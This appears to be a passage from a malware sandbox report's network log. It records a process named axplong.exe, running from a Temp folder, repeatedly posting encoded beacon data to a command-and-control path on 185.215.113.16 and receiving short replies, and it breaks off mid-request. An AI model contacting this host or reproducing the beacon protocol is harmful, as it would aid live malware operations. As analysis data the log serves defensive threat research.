                  Sep 26, 2024 19:52:46.222337961 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:46.929013968 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:46.929982901 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:47.157448053 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  40192.168.2.549752185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:47.277502060 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:48.001543045 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:48.002345085 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:48.234405041 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  41192.168.2.549753185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:48.357139111 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:49.080169916 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:49.081532001 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:49.308681965 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  42192.168.2.549754185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:49.433639050 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:50.126606941 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:50.127507925 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:50.351277113 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  43192.168.2.549755185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:50.464840889 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:51.179711103 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:51.180469036 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:51.407063961 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  44192.168.2.549756185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:51.602061987 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:52.312113047 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:52.313121080 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:52.541975975 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  45192.168.2.549757185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:52.656029940 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:53.356956959 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:53.357713938 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:53.580178022 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  46192.168.2.549758185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:53.699728966 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:54.399414062 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:54.400074005 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:54.623898983 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  47192.168.2.549759185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:54.746485949 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:55.495796919 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:55.496505976 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:55.720407009 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  48192.168.2.549760185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:55.839996099 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:56.574448109 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:56.575239897 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:56.810282946 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  49192.168.2.549761185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:56.918185949 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:57.609208107 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:57.612977982 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:57.835885048 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  50192.168.2.549762185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:57.949594975 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:58.652231932 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:58.653228998 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:58.880757093 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  51192.168.2.549763185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:58.996516943 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
